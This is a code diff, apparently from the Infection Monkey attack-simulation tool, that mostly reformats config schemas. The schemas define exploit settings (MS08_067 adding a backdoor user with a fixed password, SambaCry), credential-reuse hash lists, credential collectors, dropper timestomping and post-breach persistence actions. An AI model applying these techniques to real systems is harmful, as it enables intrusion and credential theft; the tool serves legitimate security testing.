- "attack_techniques": ["T1003", "T1005"],
+ "type":"string",
+ "enum":[AZURE_CRED_COLLECTOR],
+ "title":"Azure credential collector",
+ "safe":True,
+ "info":"Collects password credentials from Azure VMs",
+ "attack_techniques":["T1003", "T1005"],
},
],
}
diff --git a/monkey/monkey_island/cc/services/config_schema/internal.py b/monkey/monkey_island/cc/services/config_schema/internal.py
index 890e74efa..0c0f878ae 100644
--- a/monkey/monkey_island/cc/services/config_schema/internal.py
+++ b/monkey/monkey_island/cc/services/config_schema/internal.py
@@ -1,146 +1,154 @@
from monkey_island.cc.services.utils.typographic_symbols import WARNING_SIGN
INTERNAL = {
- "title": "Internal",
- "type": "object",
- "properties": {
- "general": {
- "title": "General",
- "type": "object",
- "properties": {
- "singleton_mutex_name": {
- "title": "Singleton mutex name",
- "type": "string",
- "default": "{2384ec59-0df8-4ab9-918c-843740924a28}",
- "description": "The name of the mutex used to determine whether the monkey is already running",
+ "title":"Internal",
+ "type":"object",
+ "properties":{
+ "general":{
+ "title":"General",
+ "type":"object",
+ "properties":{
+ "singleton_mutex_name":{
+ "title":"Singleton mutex name",
+ "type":"string",
+ "default":"{2384ec59-0df8-4ab9-918c-843740924a28}",
+ "description":"The name of the mutex used to determine whether the monkey is "
+ "already running",
},
- "keep_tunnel_open_time": {
- "title": "Keep tunnel open time",
- "type": "integer",
- "default": 60,
- "description": "Time to keep tunnel open before going down after last exploit (in seconds)",
+ "keep_tunnel_open_time":{
+ "title":"Keep tunnel open time",
+ "type":"integer",
+ "default":60,
+ "description":"Time to keep tunnel open before going down after last exploit "
+ "(in seconds)",
},
- "monkey_dir_name": {
- "title": "Monkey's directory name",
- "type": "string",
- "default": r"monkey_dir",
- "description": "Directory name for the directory which will contain all of the monkey files",
+ "monkey_dir_name":{
+ "title":"Monkey's directory name",
+ "type":"string",
+ "default":r"monkey_dir",
+ "description":"Directory name for the directory which will contain all of the"
+ " monkey files",
},
- "started_on_island": {
- "title": "Started on island",
- "type": "boolean",
- "default": False,
- "description": "Was exploitation started from island"
- "(did monkey with max depth ran on island)",
+ "started_on_island":{
+ "title":"Started on island",
+ "type":"boolean",
+ "default":False,
+ "description":"Was exploitation started from island"
+ "(did monkey with max depth ran on island)",
},
},
},
- "monkey": {
- "title": "Monkey",
- "type": "object",
- "properties": {
- "victims_max_find": {
- "title": "Max victims to find",
- "type": "integer",
- "default": 100,
- "description": "Determines the maximum number of machines the monkey is allowed to scan",
+ "monkey":{
+ "title":"Monkey",
+ "type":"object",
+ "properties":{
+ "victims_max_find":{
+ "title":"Max victims to find",
+ "type":"integer",
+ "default":100,
+ "description":"Determines the maximum number of machines the monkey is "
+ "allowed to scan",
},
- "victims_max_exploit": {
- "title": "Max victims to exploit",
- "type": "integer",
- "default": 100,
- "description": "Determines the maximum number of machines the monkey"
- " is allowed to successfully exploit. "
- + WARNING_SIGN
- + " Note that setting this value too high may result in the monkey propagating to "
- "a high number of machines",
+ "victims_max_exploit":{
+ "title":"Max victims to exploit",
+ "type":"integer",
+ "default":100,
+ "description":"Determines the maximum number of machines the monkey"
+ " is allowed to successfully exploit. "
+ + WARNING_SIGN
+ + " Note that setting this value too high may result in the "
+ "monkey propagating to "
+ "a high number of machines",
},
- "internet_services": {
- "title": "Internet services",
- "type": "array",
- "uniqueItems": True,
- "items": {"type": "string"},
- "default": ["monkey.guardicore.com", "www.google.com"],
- "description": "List of internet services to try and communicate with to determine internet"
- " connectivity (use either ip or domain)",
+ "internet_services":{
+ "title":"Internet services",
+ "type":"array",
+ "uniqueItems":True,
+ "items":{"type":"string"},
+ "default":["monkey.guardicore.com", "www.google.com"],
+ "description":"List of internet services to try and communicate with to "
+ "determine internet"
+ " connectivity (use either ip or domain)",
},
- "self_delete_in_cleanup": {
- "title": "Self delete on cleanup",
- "type": "boolean",
- "default": True,
- "description": "Should the monkey delete its executable when going down",
+ "self_delete_in_cleanup":{
+ "title":"Self delete on cleanup",
+ "type":"boolean",
+ "default":True,
+ "description":"Should the monkey delete its executable when going down",
},
- "use_file_logging": {
- "title": "Use file logging",
- "type": "boolean",
- "default": True,
- "description": "Should the monkey dump to a log file",
+ "use_file_logging":{
+ "title":"Use file logging",
+ "type":"boolean",
+ "default":True,
+ "description":"Should the monkey dump to a log file",
},
- "serialize_config": {
- "title": "Serialize config",
- "type": "boolean",
- "default": False,
- "description": "Should the monkey dump its config on startup",
+ "serialize_config":{
+ "title":"Serialize config",
+ "type":"boolean",
+ "default":False,
+ "description":"Should the monkey dump its config on startup",
},
- "alive": {
- "title": "Alive",
- "type": "boolean",
- "default": True,
- "description": "Is the monkey alive",
+ "alive":{
+ "title":"Alive",
+ "type":"boolean",
+ "default":True,
+ "description":"Is the monkey alive",
},
- "aws_keys": {
- "type": "object",
- "properties": {
- "aws_access_key_id": {"type": "string", "default": ""},
- "aws_secret_access_key": {"type": "string", "default": ""},
- "aws_session_token": {"type": "string", "default": ""},
+ "aws_keys":{
+ "type":"object",
+ "properties":{
+ "aws_access_key_id":{"type":"string", "default":""},
+ "aws_secret_access_key":{"type":"string", "default":""},
+ "aws_session_token":{"type":"string", "default":""},
},
},
},
},
- "island_server": {
- "title": "Island server",
- "type": "object",
- "properties": {
- "command_servers": {
- "title": "Island server's IP's",
- "type": "array",
- "uniqueItems": True,
- "items": {"type": "string"},
- "default": ["192.0.2.0:5000"],
- "description": "List of command servers/network interfaces to try to communicate with "
- "(format is :)",
+ "island_server":{
+ "title":"Island server",
+ "type":"object",
+ "properties":{
+ "command_servers":{
+ "title":"Island server's IP's",
+ "type":"array",
+ "uniqueItems":True,
+ "items":{"type":"string"},
+ "default":["192.0.2.0:5000"],
+ "description":"List of command servers/network interfaces to try to "
+ "communicate with "
+ "(format is :)",
},
- "current_server": {
- "title": "Current server",
- "type": "string",
- "default": "192.0.2.0:5000",
- "description": "The current command server the monkey is communicating with",
+ "current_server":{
+ "title":"Current server",
+ "type":"string",
+ "default":"192.0.2.0:5000",
+ "description":"The current command server the monkey is communicating with",
},
},
},
- "network": {
- "title": "Network",
- "type": "object",
- "properties": {
- "tcp_scanner": {
- "title": "TCP scanner",
- "type": "object",
- "properties": {
- "HTTP_PORTS": {
- "title": "HTTP ports",
- "type": "array",
- "uniqueItems": True,
- "items": {"type": "integer"},
- "default": [80, 8080, 443, 8008, 7001, 9200],
- "description": "List of ports the monkey will check if are being used for HTTP",
+ "network":{
+ "title":"Network",
+ "type":"object",
+ "properties":{
+ "tcp_scanner":{
+ "title":"TCP scanner",
+ "type":"object",
+ "properties":{
+ "HTTP_PORTS":{
+ "title":"HTTP ports",
+ "type":"array",
+ "uniqueItems":True,
+ "items":{"type":"integer"},
+ "default":[80, 8080, 443, 8008, 7001, 9200],
+ "description":"List of ports the monkey will check if are being used "
+ "for HTTP",
},
- "tcp_target_ports": {
- "title": "TCP target ports",
- "type": "array",
- "uniqueItems": True,
- "items": {"type": "integer"},
- "default": [
+ "tcp_target_ports":{
+ "title":"TCP target ports",
+ "type":"array",
+ "uniqueItems":True,
+ "items":{"type":"integer"},
+ "default":[
22,
2222,
445,
@@ -154,52 +162,55 @@ INTERNAL = {
7001,
8088,
],
- "description": "List of TCP ports the monkey will check whether they're open",
+ "description":"List of TCP ports the monkey will check whether "
+ "they're open",
},
- "tcp_scan_interval": {
- "title": "TCP scan interval",
- "type": "integer",
- "default": 0,
- "description": "Time to sleep (in milliseconds) between scans",
+ "tcp_scan_interval":{
+ "title":"TCP scan interval",
+ "type":"integer",
+ "default":0,
+ "description":"Time to sleep (in milliseconds) between scans",
},
- "tcp_scan_timeout": {
- "title": "TCP scan timeout",
- "type": "integer",
- "default": 3000,
- "description": "Maximum time (in milliseconds) to wait for TCP response",
+ "tcp_scan_timeout":{
+ "title":"TCP scan timeout",
+ "type":"integer",
+ "default":3000,
+ "description":"Maximum time (in milliseconds) to wait for TCP response",
},
- "tcp_scan_get_banner": {
- "title": "TCP scan - get banner",
- "type": "boolean",
- "default": True,
- "description": "Determines whether the TCP scan should try to get the banner",
+ "tcp_scan_get_banner":{
+ "title":"TCP scan - get banner",
+ "type":"boolean",
+ "default":True,
+ "description":"Determines whether the TCP scan should try to get the "
+ "banner",
},
},
},
- "ping_scanner": {
- "title": "Ping scanner",
- "type": "object",
- "properties": {
- "ping_scan_timeout": {
- "title": "Ping scan timeout",
- "type": "integer",
- "default": 1000,
- "description": "Maximum time (in milliseconds) to wait for ping response",
+ "ping_scanner":{
+ "title":"Ping scanner",
+ "type":"object",
+ "properties":{
+ "ping_scan_timeout":{
+ "title":"Ping scan timeout",
+ "type":"integer",
+ "default":1000,
+ "description":"Maximum time (in milliseconds) to wait for ping "
+ "response",
}
},
},
},
},
- "classes": {
- "title": "Classes",
- "type": "object",
- "properties": {
- "finger_classes": {
- "title": "Fingerprint classes",
- "type": "array",
- "uniqueItems": True,
- "items": {"$ref": "#/definitions/finger_classes"},
- "default": [
+ "classes":{
+ "title":"Classes",
+ "type":"object",
+ "properties":{
+ "finger_classes":{
+ "title":"Fingerprint classes",
+ "type":"array",
+ "uniqueItems":True,
+ "items":{"$ref":"#/definitions/finger_classes"},
+ "default":[
"SMBFinger",
"SSHFinger",
"PingScanner",
@@ -212,195 +223,204 @@ INTERNAL = {
}
},
},
- "kill_file": {
- "title": "Kill file",
- "type": "object",
- "properties": {
- "kill_file_path_windows": {
- "title": "Kill file path on Windows",
- "type": "string",
- "default": "%windir%\\monkey.not",
- "description": "Path of file which kills monkey if it exists (on Windows)",
+ "kill_file":{
+ "title":"Kill file",
+ "type":"object",
+ "properties":{
+ "kill_file_path_windows":{
+ "title":"Kill file path on Windows",
+ "type":"string",
+ "default":"%windir%\\monkey.not",
+ "description":"Path of file which kills monkey if it exists (on Windows)",
},
- "kill_file_path_linux": {
- "title": "Kill file path on Linux",
- "type": "string",
- "default": "/var/run/monkey.not",
- "description": "Path of file which kills monkey if it exists (on Linux)",
+ "kill_file_path_linux":{
+ "title":"Kill file path on Linux",
+ "type":"string",
+ "default":"/var/run/monkey.not",
+ "description":"Path of file which kills monkey if it exists (on Linux)",
},
},
},
- "dropper": {
- "title": "Dropper",
- "type": "object",
- "properties": {
- "dropper_set_date": {
- "title": "Dropper sets date",
- "type": "boolean",
- "default": True,
- "description": "Determines whether the dropper should set the monkey's file date to be the same as"
- " another file",
+ "dropper":{
+ "title":"Dropper",
+ "type":"object",
+ "properties":{
+ "dropper_set_date":{
+ "title":"Dropper sets date",
+ "type":"boolean",
+ "default":True,
+ "description":"Determines whether the dropper should set the monkey's file "
+ "date to be the same as"
+ " another file",
},
- "dropper_date_reference_path_windows": {
- "title": "Dropper date reference path (Windows)",
- "type": "string",
- "default": "%windir%\\system32\\kernel32.dll",
- "description": "Determines which file the dropper should copy the date from if it's configured to do"
- " so on Windows (use fullpath)",
+ "dropper_date_reference_path_windows":{
+ "title":"Dropper date reference path (Windows)",
+ "type":"string",
+ "default":"%windir%\\system32\\kernel32.dll",
+ "description":"Determines which file the dropper should copy the date from if "
+ "it's configured to do"
+ " so on Windows (use fullpath)",
},
- "dropper_date_reference_path_linux": {
- "title": "Dropper date reference path (Linux)",
- "type": "string",
- "default": "/bin/sh",
- "description": "Determines which file the dropper should copy the date from if it's configured to do"
- " so on Linux (use fullpath)",
+ "dropper_date_reference_path_linux":{
+ "title":"Dropper date reference path (Linux)",
+ "type":"string",
+ "default":"/bin/sh",
+ "description":"Determines which file the dropper should copy the date from if "
+ "it's configured to do"
+ " so on Linux (use fullpath)",
},
- "dropper_target_path_linux": {
- "title": "Dropper target path on Linux",
- "type": "string",
- "default": "/tmp/monkey",
- "description": "Determines where should the dropper place the monkey on a Linux machine",
+ "dropper_target_path_linux":{
+ "title":"Dropper target path on Linux",
+ "type":"string",
+ "default":"/tmp/monkey",
+ "description":"Determines where should the dropper place the monkey on a "
+ "Linux machine",
},
- "dropper_target_path_win_32": {
- "title": "Dropper target path on Windows (32bit)",
- "type": "string",
- "default": "C:\\Windows\\temp\\monkey32.exe",
- "description": "Determines where should the dropper place the monkey on a Windows machine "
- "(32bit)",
+ "dropper_target_path_win_32":{
+ "title":"Dropper target path on Windows (32bit)",
+ "type":"string",
+ "default":"C:\\Windows\\temp\\monkey32.exe",
+ "description":"Determines where should the dropper place the monkey on a "
+ "Windows machine "
+ "(32bit)",
},
- "dropper_target_path_win_64": {
- "title": "Dropper target path on Windows (64bit)",
- "type": "string",
- "default": "C:\\Windows\\temp\\monkey64.exe",
- "description": "Determines where should the dropper place the monkey on a Windows machine "
- "(64 bit)",
+ "dropper_target_path_win_64":{
+ "title":"Dropper target path on Windows (64bit)",
+ "type":"string",
+ "default":"C:\\Windows\\temp\\monkey64.exe",
+ "description":"Determines where should the dropper place the monkey on a "
+ "Windows machine "
+ "(64 bit)",
},
- "dropper_try_move_first": {
- "title": "Try to move first",
- "type": "boolean",
- "default": True,
- "description": "Determines whether the dropper should try to move itself instead of copying itself"
- " to target path",
+ "dropper_try_move_first":{
+ "title":"Try to move first",
+ "type":"boolean",
+ "default":True,
+ "description":"Determines whether the dropper should try to move itself "
+ "instead of copying itself"
+ " to target path",
},
},
},
- "logging": {
- "title": "Logging",
- "type": "object",
- "properties": {
- "dropper_log_path_linux": {
- "title": "Dropper log file path on Linux",
- "type": "string",
- "default": "/tmp/user-1562",
- "description": "The fullpath of the dropper log file on Linux",
+ "logging":{
+ "title":"Logging",
+ "type":"object",
+ "properties":{
+ "dropper_log_path_linux":{
+ "title":"Dropper log file path on Linux",
+ "type":"string",
+ "default":"/tmp/user-1562",
+ "description":"The fullpath of the dropper log file on Linux",
},
- "dropper_log_path_windows": {
- "title": "Dropper log file path on Windows",
- "type": "string",
- "default": "%temp%\\~df1562.tmp",
- "description": "The fullpath of the dropper log file on Windows",
+ "dropper_log_path_windows":{
+ "title":"Dropper log file path on Windows",
+ "type":"string",
+ "default":"%temp%\\~df1562.tmp",
+ "description":"The fullpath of the dropper log file on Windows",
},
- "monkey_log_path_linux": {
- "title": "Monkey log file path on Linux",
- "type": "string",
- "default": "/tmp/user-1563",
- "description": "The fullpath of the monkey log file on Linux",
+ "monkey_log_path_linux":{
+ "title":"Monkey log file path on Linux",
+ "type":"string",
+ "default":"/tmp/user-1563",
+ "description":"The fullpath of the monkey log file on Linux",
},
- "monkey_log_path_windows": {
- "title": "Monkey log file path on Windows",
- "type": "string",
- "default": "%temp%\\~df1563.tmp",
- "description": "The fullpath of the monkey log file on Windows",
+ "monkey_log_path_windows":{
+ "title":"Monkey log file path on Windows",
+ "type":"string",
+ "default":"%temp%\\~df1563.tmp",
+ "description":"The fullpath of the monkey log file on Windows",
},
- "send_log_to_server": {
- "title": "Send log to server",
- "type": "boolean",
- "default": True,
- "description": "Determines whether the monkey sends its log to the Monkey Island server",
+ "send_log_to_server":{
+ "title":"Send log to server",
+ "type":"boolean",
+ "default":True,
+ "description":"Determines whether the monkey sends its log to the Monkey "
+ "Island server",
},
},
},
- "exploits": {
- "title": "Exploits",
- "type": "object",
- "properties": {
- "exploit_lm_hash_list": {
- "title": "Exploit LM hash list",
- "type": "array",
- "uniqueItems": True,
- "items": {"type": "string"},
- "default": [],
- "description": "List of LM hashes to use on exploits using credentials",
+ "exploits":{
+ "title":"Exploits",
+ "type":"object",
+ "properties":{
+ "exploit_lm_hash_list":{
+ "title":"Exploit LM hash list",
+ "type":"array",
+ "uniqueItems":True,
+ "items":{"type":"string"},
+ "default":[],
+ "description":"List of LM hashes to use on exploits using credentials",
},
- "exploit_ntlm_hash_list": {
- "title": "Exploit NTLM hash list",
- "type": "array",
- "uniqueItems": True,
- "items": {"type": "string"},
- "default": [],
- "description": "List of NTLM hashes to use on exploits using credentials",
+ "exploit_ntlm_hash_list":{
+ "title":"Exploit NTLM hash list",
+ "type":"array",
+ "uniqueItems":True,
+ "items":{"type":"string"},
+ "default":[],
+ "description":"List of NTLM hashes to use on exploits using credentials",
},
- "exploit_ssh_keys": {
- "title": "SSH key pairs list",
- "type": "array",
- "uniqueItems": True,
- "default": [],
- "items": {"type": "string"},
- "description": "List of SSH key pairs to use, when trying to ssh into servers",
+ "exploit_ssh_keys":{
+ "title":"SSH key pairs list",
+ "type":"array",
+ "uniqueItems":True,
+ "default":[],
+ "items":{"type":"string"},
+ "description":"List of SSH key pairs to use, when trying to ssh into servers",
},
- "general": {
- "title": "General",
- "type": "object",
- "properties": {
- "skip_exploit_if_file_exist": {
- "title": "Skip exploit if file exists",
- "type": "boolean",
- "default": False,
- "description": "Determines whether the monkey should skip the exploit if the monkey's file"
- " is already on the remote machine",
+ "general":{
+ "title":"General",
+ "type":"object",
+ "properties":{
+ "skip_exploit_if_file_exist":{
+ "title":"Skip exploit if file exists",
+ "type":"boolean",
+ "default":False,
+ "description":"Determines whether the monkey should skip the exploit "
+ "if the monkey's file"
+ " is already on the remote machine",
}
},
},
- "ms08_067": {
- "title": "MS08_067",
- "type": "object",
- "properties": {
- "ms08_067_exploit_attempts": {
- "title": "MS08_067 exploit attempts",
- "type": "integer",
- "default": 5,
- "description": "Number of attempts to exploit using MS08_067",
+ "ms08_067":{
+ "title":"MS08_067",
+ "type":"object",
+ "properties":{
+ "ms08_067_exploit_attempts":{
+ "title":"MS08_067 exploit attempts",
+ "type":"integer",
+ "default":5,
+ "description":"Number of attempts to exploit using MS08_067",
},
- "user_to_add": {
- "title": "Remote user",
- "type": "string",
- "default": "Monkey_IUSER_SUPPORT",
- "description": "Username to add on successful exploit",
+ "user_to_add":{
+ "title":"Remote user",
+ "type":"string",
+ "default":"Monkey_IUSER_SUPPORT",
+ "description":"Username to add on successful exploit",
},
- "remote_user_pass": {
- "title": "Remote user password",
- "type": "string",
- "default": "Password1!",
- "description": "Password to use for created user",
+ "remote_user_pass":{
+ "title":"Remote user password",
+ "type":"string",
+ "default":"Password1!",
+ "description":"Password to use for created user",
},
},
},
- "sambacry": {
- "title": "SambaCry",
- "type": "object",
- "properties": {
- "sambacry_trigger_timeout": {
- "title": "SambaCry trigger timeout",
- "type": "integer",
- "default": 5,
- "description": "Timeout (in seconds) of SambaCry trigger",
+ "sambacry":{
+ "title":"SambaCry",
+ "type":"object",
+ "properties":{
+ "sambacry_trigger_timeout":{
+ "title":"SambaCry trigger timeout",
+ "type":"integer",
+ "default":5,
+ "description":"Timeout (in seconds) of SambaCry trigger",
},
- "sambacry_folder_paths_to_guess": {
- "title": "SambaCry folder paths to guess",
- "type": "array",
- "uniqueItems": True,
- "items": {"type": "string"},
- "default": [
+ "sambacry_folder_paths_to_guess":{
+ "title":"SambaCry folder paths to guess",
+ "type":"array",
+ "uniqueItems":True,
+ "items":{"type":"string"},
+ "default":[
"/",
"/mnt",
"/tmp",
@@ -410,48 +430,53 @@ INTERNAL = {
"/shares",
"/home",
],
- "description": "List of full paths to share folder for SambaCry to guess",
+ "description":"List of full paths to share folder for SambaCry to "
+ "guess",
},
- "sambacry_shares_not_to_check": {
- "title": "SambaCry shares not to check",
- "type": "array",
- "uniqueItems": True,
- "items": {"type": "string"},
- "default": ["IPC$", "print$"],
- "description": "These shares won't be checked when exploiting with SambaCry",
+ "sambacry_shares_not_to_check":{
+ "title":"SambaCry shares not to check",
+ "type":"array",
+ "uniqueItems":True,
+ "items":{"type":"string"},
+ "default":["IPC$", "print$"],
+ "description":"These shares won't be checked when exploiting with "
+ "SambaCry",
},
},
},
},
- "smb_service": {
- "title": "SMB service",
- "type": "object",
- "properties": {
- "smb_download_timeout": {
- "title": "SMB download timeout",
- "type": "integer",
- "default": 300,
- "description": "Timeout (in seconds) for SMB download operation (used in various exploits using SMB)",
+ "smb_service":{
+ "title":"SMB service",
+ "type":"object",
+ "properties":{
+ "smb_download_timeout":{
+ "title":"SMB download timeout",
+ "type":"integer",
+ "default":300,
+ "description":"Timeout (in seconds) for SMB download operation (used in "
+ "various exploits using SMB)",
},
- "smb_service_name": {
- "title": "SMB service name",
- "type": "string",
- "default": "InfectionMonkey",
- "description": "Name of the SMB service that will be set up to download monkey",
+ "smb_service_name":{
+ "title":"SMB service name",
+ "type":"string",
+ "default":"InfectionMonkey",
+ "description":"Name of the SMB service that will be set up to download "
+ "monkey",
},
},
},
},
- "testing": {
- "title": "Testing",
- "type": "object",
- "properties": {
- "export_monkey_telems": {
- "title": "Export monkey telemetries",
- "type": "boolean",
- "default": False,
- "description": "Exports unencrypted telemetries that can be used for tests in development."
- " Do not turn on!",
+ "testing":{
+ "title":"Testing",
+ "type":"object",
+ "properties":{
+ "export_monkey_telems":{
+ "title":"Export monkey telemetries",
+ "type":"boolean",
+ "default":False,
+ "description":"Exports unencrypted telemetries that "
+ "can be used for tests in development."
+ " Do not turn on!",
}
},
},
diff --git a/monkey/monkey_island/cc/services/config_schema/monkey.py b/monkey/monkey_island/cc/services/config_schema/monkey.py
index 0d69c5aa4..5e2e9eb2e 100644
--- a/monkey/monkey_island/cc/services/config_schema/monkey.py
+++ b/monkey/monkey_island/cc/services/config_schema/monkey.py
@@ -8,65 +8,65 @@ from common.common_consts.system_info_collectors_names import (
)
MONKEY = {
- "title": "Monkey",
- "type": "object",
- "properties": {
- "post_breach": {
- "title": "Post breach",
- "type": "object",
- "properties": {
- "custom_PBA_linux_cmd": {
- "title": "Linux post-breach command",
- "type": "string",
- "default": "",
- "description": "Command to be executed after breaching. "
- "Use this field to run custom commands or execute uploaded "
- "files on exploited machines.\nExample: "
- '"chmod +x ./my_script.sh; ./my_script.sh ; rm ./my_script.sh"',
+ "title":"Monkey",
+ "type":"object",
+ "properties":{
+ "post_breach":{
+ "title":"Post breach",
+ "type":"object",
+ "properties":{
+ "custom_PBA_linux_cmd":{
+ "title":"Linux post-breach command",
+ "type":"string",
+ "default":"",
+ "description":"Command to be executed after breaching. "
+ "Use this field to run custom commands or execute uploaded "
+ "files on exploited machines.\nExample: "
+ '"chmod +x ./my_script.sh; ./my_script.sh ; rm ./my_script.sh"',
},
- "PBA_linux_file": {
- "title": "Linux post-breach file",
- "type": "string",
- "format": "data-url",
- "description": "File to be uploaded after breaching. "
- "Use the 'Linux post-breach command' field to "
- "change permissions, run, or delete the file. "
- "Reference your file by filename.",
+ "PBA_linux_file":{
+ "title":"Linux post-breach file",
+ "type":"string",
+ "format":"data-url",
+ "description":"File to be uploaded after breaching. "
+ "Use the 'Linux post-breach command' field to "
+ "change permissions, run, or delete the file. "
+ "Reference your file by filename.",
},
- "custom_PBA_windows_cmd": {
- "title": "Windows post-breach command",
- "type": "string",
- "default": "",
- "description": "Command to be executed after breaching. "
- "Use this field to run custom commands or execute uploaded "
- "files on exploited machines.\nExample: "
- '"my_script.bat & del my_script.bat"',
+ "custom_PBA_windows_cmd":{
+ "title":"Windows post-breach command",
+ "type":"string",
+ "default":"",
+ "description":"Command to be executed after breaching. "
+ "Use this field to run custom commands or execute uploaded "
+ "files on exploited machines.\nExample: "
+ '"my_script.bat & del my_script.bat"',
},
- "PBA_windows_file": {
- "title": "Windows post-breach file",
- "type": "string",
- "format": "data-url",
- "description": "File to be uploaded after breaching. "
- "Use the 'Windows post-breach command' field to "
- "change permissions, run, or delete the file. "
- "Reference your file by filename.",
+ "PBA_windows_file":{
+ "title":"Windows post-breach file",
+ "type":"string",
+ "format":"data-url",
+ "description":"File to be uploaded after breaching. "
+ "Use the 'Windows post-breach command' field to "
+ "change permissions, run, or delete the file. "
+ "Reference your file by filename.",
},
- "PBA_windows_filename": {
- "title": "Windows PBA filename",
- "type": "string",
- "default": "",
+ "PBA_windows_filename":{
+ "title":"Windows PBA filename",
+ "type":"string",
+ "default":"",
},
- "PBA_linux_filename": {
- "title": "Linux PBA filename",
- "type": "string",
- "default": "",
+ "PBA_linux_filename":{
+ "title":"Linux PBA filename",
+ "type":"string",
+ "default":"",
},
- "post_breach_actions": {
- "title": "Post breach actions",
- "type": "array",
- "uniqueItems": True,
- "items": {"$ref": "#/definitions/post_breach_actions"},
- "default": [
+ "post_breach_actions":{
+ "title":"Post breach actions",
+ "type":"array",
+ "uniqueItems":True,
+ "items":{"$ref":"#/definitions/post_breach_actions"},
+ "default":[
"BackdoorUser",
"CommunicateAsNewUser",
"ModifyShellStartupFiles",
@@ -80,16 +80,16 @@ MONKEY = {
},
},
},
- "system_info": {
- "title": "System info",
- "type": "object",
- "properties": {
- "system_info_collector_classes": {
- "title": "System info collectors",
- "type": "array",
- "uniqueItems": True,
- "items": {"$ref": "#/definitions/system_info_collector_classes"},
- "default": [
+ "system_info":{
+ "title":"System info",
+ "type":"object",
+ "properties":{
+ "system_info_collector_classes":{
+ "title":"System info collectors",
+ "type":"array",
+ "uniqueItems":True,
+ "items":{"$ref":"#/definitions/system_info_collector_classes"},
+ "default":[
ENVIRONMENT_COLLECTOR,
AWS_COLLECTOR,
HOSTNAME_COLLECTOR,
@@ -100,31 +100,33 @@ MONKEY = {
},
},
},
- "persistent_scanning": {
- "title": "Persistent scanning",
- "type": "object",
- "properties": {
- "max_iterations": {
- "title": "Max iterations",
- "type": "integer",
- "default": 1,
- "minimum": 1,
- "description": "Determines how many iterations of the monkey's full lifecycle should occur "
- "(how many times to do the scan)",
+ "persistent_scanning":{
+ "title":"Persistent scanning",
+ "type":"object",
+ "properties":{
+ "max_iterations":{
+ "title":"Max iterations",
+ "type":"integer",
+ "default":1,
+ "minimum":1,
+ "description":"Determines how many iterations of the monkey's full lifecycle "
+ "should occur "
+ "(how many times to do the scan)",
},
- "timeout_between_iterations": {
- "title": "Wait time between iterations",
- "type": "integer",
- "default": 100,
- "minimum": 0,
- "description": "Determines for how long (in seconds) should the monkey wait before starting another scan",
+ "timeout_between_iterations":{
+ "title":"Wait time between iterations",
+ "type":"integer",
+ "default":100,
+ "minimum":0,
+ "description":"Determines for how long (in seconds) should the monkey wait "
+ "before starting another scan",
},
- "retry_failed_explotation": {
- "title": "Retry failed exploitation",
- "type": "boolean",
- "default": True,
- "description": "Determines whether the monkey should retry exploiting machines"
- " it didn't successfully exploit on previous scans",
+ "retry_failed_explotation":{
+ "title":"Retry failed exploitation",
+ "type":"boolean",
+ "default":True,
+ "description":"Determines whether the monkey should retry exploiting machines"
+ " it didn't successfully exploit on previous scans",
},
},
},
diff --git a/monkey/monkey_island/cc/services/edge/displayed_edge.py b/monkey/monkey_island/cc/services/edge/displayed_edge.py
index 67d42a3ab..00f06fd89 100644
--- a/monkey/monkey_island/cc/services/edge/displayed_edge.py
+++ b/monkey/monkey_island/cc/services/edge/displayed_edge.py
@@ -27,7 +27,7 @@ class DisplayedEdgeService:
if len(edge.scans) > 0:
services = DisplayedEdgeService.services_to_displayed_services(
- edge.scans[-1]["data"]["services"], for_report
+ edge.scans[-1]["data"]["services"], for_report
)
os = edge.scans[-1]["data"]["os"]
@@ -36,7 +36,8 @@ class DisplayedEdgeService:
displayed_edge["ip_address"] = edge.ip_address
displayed_edge["services"] = services
displayed_edge["os"] = os
- # we need to deepcopy all mutable edge properties, because weak-reference link is made otherwise,
+ # we need to deepcopy all mutable edge properties, because weak-reference link is made
+ # otherwise,
# which is destroyed after method is exited and causes an error later.
displayed_edge["exploits"] = deepcopy(edge.exploits)
displayed_edge["_label"] = edge.get_label()
@@ -45,12 +46,12 @@ class DisplayedEdgeService:
@staticmethod
def generate_pseudo_edge(edge_id, src_node_id, dst_node_id, src_label, dst_label):
edge = {
- "id": edge_id,
- "from": src_node_id,
- "to": dst_node_id,
- "group": "island",
- "src_label": src_label,
- "dst_label": dst_label,
+ "id":edge_id,
+ "from":src_node_id,
+ "to":dst_node_id,
+ "group":"island",
+ "src_label":src_label,
+ "dst_label":dst_label,
}
edge["_label"] = DisplayedEdgeService.get_pseudo_label(edge)
return edge
@@ -72,12 +73,12 @@ class DisplayedEdgeService:
@staticmethod
def edge_to_net_edge(edge: EdgeService):
return {
- "id": edge.id,
- "from": edge.src_node_id,
- "to": edge.dst_node_id,
- "group": edge.get_group(),
- "src_label": edge.src_label,
- "dst_label": edge.dst_label,
+ "id":edge.id,
+ "from":edge.src_node_id,
+ "to":edge.dst_node_id,
+ "group":edge.get_group(),
+ "src_label":edge.src_label,
+ "dst_label":edge.dst_label,
}
diff --git a/monkey/monkey_island/cc/services/edge/edge.py b/monkey/monkey_island/cc/services/edge/edge.py
index 461b0e8a5..1750ca4a9 100644
--- a/monkey/monkey_island/cc/services/edge/edge.py
+++ b/monkey/monkey_island/cc/services/edge/edge.py
@@ -44,7 +44,7 @@ class EdgeService(Edge):
self.dst_label = label
else:
raise DoesNotExist(
- "Node id provided does not match with any endpoint of an self provided."
+ "Node id provided does not match with any endpoint of an self provided."
)
self.save()
@@ -67,7 +67,7 @@ class EdgeService(Edge):
def update_based_on_scan_telemetry(self, telemetry: Dict):
machine_info = copy.deepcopy(telemetry["data"]["machine"])
- new_scan = {"timestamp": telemetry["timestamp"], "data": machine_info}
+ new_scan = {"timestamp":telemetry["timestamp"], "data":machine_info}
ip_address = machine_info.pop("ip_addr")
domain_name = machine_info.pop("domain_name")
self.scans.append(new_scan)
diff --git a/monkey/monkey_island/cc/services/edge/test_displayed_edge.py b/monkey/monkey_island/cc/services/edge/test_displayed_edge.py
index 2938909c2..468e9f9c9 100644
--- a/monkey/monkey_island/cc/services/edge/test_displayed_edge.py
+++ b/monkey/monkey_island/cc/services/edge/test_displayed_edge.py
@@ -5,46 +5,45 @@ from monkey_island.cc.services.edge.edge import RIGHT_ARROW, EdgeService
SCAN_DATA_MOCK = [
{
- "timestamp": "2020-05-27T14:59:28.944Z",
- "data": {
- "os": {"type": "linux", "version": "Ubuntu-4ubuntu2.8"},
- "services": {
- "tcp-8088": {"display_name": "unknown(TCP)", "port": 8088},
- "tcp-22": {
- "display_name": "SSH",
- "port": 22,
- "banner": "SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8\r\n",
- "name": "ssh",
